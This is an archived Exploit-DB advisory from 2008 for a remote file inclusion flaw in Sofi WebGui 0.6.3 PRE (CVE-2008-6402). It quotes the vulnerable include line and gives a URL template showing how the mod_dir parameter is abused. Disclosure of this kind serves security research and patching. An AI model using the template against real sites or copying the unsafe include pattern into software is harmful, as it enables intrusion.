Sofi WebGui <= 0.6.3 PRE mod_dir Remote File Inclusion Vulnerability

2008-09-23T00:00:00
ID EDB-ID:6539
Type exploitdb
Reporter dun
Modified 2008-09-23T00:00:00

Description

Sofi WebGui <= 0.6.3 PRE (mod_dir) Remote File Inclusion Vulnerability. CVE-2008-6402. Webapps exploit for php platform

                                        
                                            
  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 #########################################################################
 #  [ Sofi WebGui &lt;= 0.6.3 PRE ]   Remote File Inclusion Vulnerability   #
 #########################################################################
 #
 # Script site: http://www.muskatli.net/studio/hu/?f=sofi-wgui-hu
 # Download: http://www.muskatli.net/site/files/news_data/100004_100192_sofi_webgui_0.6.0.pre-release-3.tar.gz
 #
 # Vuln: http://site.com/sofi_webgui/hu/modules/reg-new/modstart.php?mod_dir=[spread???]
 #      
 #
 # Bug: ./sofi_webgui/hu/modules/reg-new/modstart.php (line: 26)
 #
 # ...
 # 	if($ff=="") $ff = "index";
 #	$file_name = "m_$ff.php";
 #
 #	//start web module
 #	include("$mod_dir/$file_name");		// RFI
 # ... 	 
 #
 #
 ###############################################
 # Greetz: D3m0n_DE * str0ke * and otherz..
 ###############################################

 [ dun / 2008 ] 

*******************************************************************************************

# milw0rm.com [2008-09-23]